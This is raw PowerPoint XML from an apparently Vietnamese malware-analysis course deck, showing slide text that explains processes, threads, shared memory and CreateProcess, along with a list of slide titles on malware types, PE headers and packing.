              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khác</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> chia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sẽ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhớ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thống</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateProcess</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5357378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err="1" smtClean="0"/>
              <a:t>Ví</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụ</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133300"/>
            <a:ext cx="5760640" cy="5265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7450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err="1" smtClean="0"/>
              <a:t>Luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (thread)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chuỗi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>độc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đợi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khác</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chứa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhớ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhưng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>kích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chiếm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> CPU.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> HĐH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chuyển</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> sang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lưu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ngữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cảnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>luồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Thread context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="880933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12075</TotalTime>
  <Words>4794</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>898</Paragraphs>
  <Slides>108</Slides>
  <Notes>17</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Office Theme</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Bio</vt:lpstr>
      <vt:lpstr>Course Outline</vt:lpstr>
      <vt:lpstr>Text-books</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Existence &amp; Motivation </vt:lpstr>
      <vt:lpstr>Malware behaviour</vt:lpstr>
      <vt:lpstr>History Computer Virus &amp; Malware</vt:lpstr>
      <vt:lpstr>Types of Malware</vt:lpstr>
      <vt:lpstr>Botnet</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Real-world Impacts</vt:lpstr>
      <vt:lpstr>Security reports</vt:lpstr>
      <vt:lpstr>Security reports</vt:lpstr>
      <vt:lpstr>Security reports</vt:lpstr>
      <vt:lpstr>PE Headers and Sections</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PE Headers and Sections</vt:lpstr>
      <vt:lpstr>Packing and Obfuscation Techniques</vt:lpstr>
      <vt:lpstr>Packing and Obfuscation Techniques</vt:lpstr>
      <vt:lpstr>Packing and Obfuscation Techniques</vt:lpstr>
